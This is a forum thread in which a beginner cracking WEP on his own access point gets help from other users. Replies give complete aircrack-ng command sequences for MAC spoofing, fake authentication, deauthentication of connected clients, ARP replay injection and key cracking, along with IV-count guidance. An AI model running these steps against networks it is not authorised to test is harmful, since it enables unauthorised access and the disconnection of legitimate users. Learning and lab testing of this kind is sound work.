Results 1 to 10 of 10

Thread: 0 ARP Requests...

  1. #1
    Just burned his ISO
    Join Date
    May 2007
    Posts
    11

    Default 0 ARP Requests...

    Hey everyone,

    So I'm trying to crack my own AP following a newbie guide that someone else posted earlier. I'm trying to figure out why I can't seem to get any ARP requests...maybe someone can tell me what I'm doing wrong here. Here's what I've done so far.

    1. Fire up Kismet, find my AP "Linksys", press ENTER to get the BSSID
    2. Go back to the main screen of Kismet, press "C" to see connected clients, grab one of the MAC addresses
    3. Store the BSSID in a variable (Export AP=00:11:22:33:44:55)
    4. Store the Client MAC in a variable (Export MAC="66:77:88:99:00:11)
    5. Fire up airodump using the following command
    airodump-ng -w capture -c 6 -a $AP ath1
    6. Start another Konsole screen, store the variables again, and get the DeAuth attack ready using the following command:
    aireplay-ng -e Linksys -a $AP -c $MAC --deauth 10 ath1
    7. Start another Konsole screen, store the variables again, execute the following command:
    aireplay-ng --arpreplay -b $AP -h $MAC ath1
    *I get something that says "The interface MAC (some MAC) doesn't math the specified MAC (-h).

    Finally, I execute the previous DeAuth command.

    The Konsole reading the packets gives notices that read "Notice: got a deauth/disassoc packet. Is the source MAC associated?". It goes right on reading the packets. It's been a little over half an hour to 45 minutes and about 60k packets have been read but still 0 ARP requests.

    Any ideas? Thanks!!

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by jason_V2 View Post
    Hey everyone,

    maybe someone can tell me what I'm doing wrong here. Here's what I've done so far.


    5. Fire up airodump using the following command

    airodump-ng -w capture -c 6 -a $AP ath1
    Try this instead..........

    When you use airodump...use airodump-ng -w capture -c 6 --bssid $AP ath1 (instead of the -a option use the --bssid as option...should work....



    Quote Originally Posted by jason_V2 View Post
    *I get something that says "The interface MAC (some MAC) doesn't math the specified MAC (-h).
    Your not associated And you need to run the following in THIS EXACT ORDER.....

    1. ifconfig ath1 down

    2. macchanger --macchanger 00:11:22:33:44:55 ath1

    3. *****then here you can run both your export scripts*****

    4. airmon-ng start ath1 6 (to set card in monitor on channel 6)

    5. aireplay-ng -1 0 -e Linksys -a $AP -h $MAC ath1 (to associate)

    6. airodump-ng -c 6 -w capture --bssid $AP ath1 (instead of your -a use --bssid)

    7. aireplay-ng -e Linksys -a $AP -c $MAC --deauth 10 ath1 (now here in the -c field..if you use $MAC it will not put the associated clients mac here..it will put the fake mac address instead...00:11:22:33:44:55 ...so I suggest you Ctrl+C airodump screen to stop it ...and copy / paste the real associated clients addy here ok??

    8. aireplay-ng --arpreplay -b $AP -h $MAC ath1





    Quote Originally Posted by jason_V2 View Post
    Finally, I execute the previous DeAuth command.

    The Konsole reading the packets gives notices that read "Notice: got a deauth/disassoc packet. Is the source MAC associated?". It goes right on reading the packets. It's been a little over half an hour to 45 minutes and about 60k packets have been read but still 0 ARP requests.
    Again...your not associated correctly...redo.....
    aireplay-ng -1 0 -e Linksys -a $AP -h $MAC ath1 (to associate) and if you get errors...check to make sure all MAC's are set up right...

    Did this help??? Hope so..Im still a LITTLE wet behind the ears, but Im trying to help as much as I can cause of all the help I got when I first started out a month ago.

    Good luck and let me know how and if this helped you.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Just burned his ISO
    Join Date
    May 2007
    Posts
    11

    Default

    Thank you! That helped...

    It seems like Aircrack is kinda slow at picking up IVs. It took about 30 minutes to gather 22,000. How many packets does it generally need to crack a 64-bit WEP key?

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Thumbs up

    Quote Originally Posted by jason_V2 View Post
    Thank you! That helped...

    It seems like Aircrack is kinda slow at picking up IVs. It took about 30 minutes to gather 22,000. How many packets does it generally need to crack a 64-bit WEP key?
    If your doing an arpreplay (the -3 option)...your waiting on the router(doing no client WEP) to generate an arp request. That could take a few minutes. Ive waited 15 minutes on my router and at other times it happens relatively fast. It just depends on your timing from when you do the arpreplay attack and when your router spits out the arp. If you want to speed it up a little bit ...you can do a frag attack (-5) or a chopchop attack..Or you can go to your wired pc thats on the network and ping an nonexistent ip...that will surly generate a quick arp request!!

    BTW....it depends if your using aircrack-ng or aircrack-ptw

    For aircrack-ng....(taken from the aircrack main site)

    Generally, don’t try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques. Start by trying 64 bit keys “aircrack-ng -n 64 captured-data.cap”. If they are using a 64 bit WEP, it can usually be cracked in less then 5 minutes (generally less then 60 seconds) with relatively few IVs. It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: “aircrack-ng captured-data.cap”. Then at every 100,000 IVs mark, retry the “aircrack-ng -n 64 captured-data.cap” for 5 minutes.

    Once you hit 600,00 IVs, switch to testing 128 bit keys. It would be unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try “aircrack-ng captured-data.cap”.

    Once you hit 2 million IVs, try changing the fudge factor to “-f 4”. Run for at least 30 minutes to one hour. Retry with increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.

    All the while, keep collecting data. Remember the golden rule, “the more IVs the better”.

    Also check out the next section on how to determine which options to use. These can also speed up cracking the WEP key. For example, if the key is all numeric, then it can take as few as 50,000 IVs to crack a 64 bit key with the “-t” versus 200,000 IVs without the “-t”. So if you have a hunch about the nature of the WEP key, it is worth trying a few variations.




    For aircrack-ptw .....The successful aircrack-ptw crack took approximately 50,000 data packets, however, the number of data packets required will obviously vary.

    It took less than 2 minutes to capture the 50,000 data packets and obtain the WEP key: 866578388517be0b4818a0db1

    This scenario was conducted in a lab environment under ideal conditions, expect the process to take a little longer in reality.

    *******LINKS FOR AIRCRACK-PTW*******

    http://wirelessdefence.org/Contents/Aircrack-ptw.htm
    http://www.cdc.informatik.tu-darmsta...crack-ptw/#top


    Hope that helped you as well jason_V2
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    for aircrack ptw dl my precompiled module, more easy than compiling no ?

    http://ovh.dl.sourceforge.net/source..._ptw_1_0_0.lzm

    hope helps
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by shamanvirtuel View Post
    for aircrack ptw dl my precompiled module, more easy than compiling no ?

    http://ovh.dl.sourceforge.net/source..._ptw_1_0_0.lzm

    hope helps
    Yes it is easier!!!! Sorry shamanvirtuel. I had forgot you had already precompiled it.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yes really useful to have it precompiled, because many compilation tries fails... i heard.....

    I precompiled also ntfs-3g, yakuakue, GDHPD and a bundle GSLAPT-slapt-get....
    more will come ...
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  8. #8
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by shamanvirtuel View Post
    yes really useful to have it precompiled, because many compilation tries fails... i heard.....

    I precompiled also ntfs-3g, yakuakue, GDHPD and a bundle GSLAPT-slapt-get....
    more will come ...
    You did yakuakue as well?? Got a link to it?? I didnt see it when I searched the above posted link.

    ****EDIT**** heres the link for anyone who wants it..

    http://ovh.dl.sourceforge.net/source...uake_2_7_5.lzm
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #9
    Just burned his ISO
    Join Date
    May 2007
    Posts
    11

    Default

    you guys are awesome. thanks so much! im on my way to *hopefully* getting out of this linux n00b phase....

  10. #10
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Thumbs up

    Quote Originally Posted by jason_V2 View Post
    you guys are awesome. thanks so much! im on my way to *hopefully* getting out of this linux n00b phase....
    Hell..Im still in the n00b phase!!!...lol I mastered Xp pro..and Ive only been playing with Linux for a month or a little less. Its very overwhelming at first...But much like windows..I'll master Linux soon enough..its all just a learning phase.

    Glad we could help you jason_V2
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •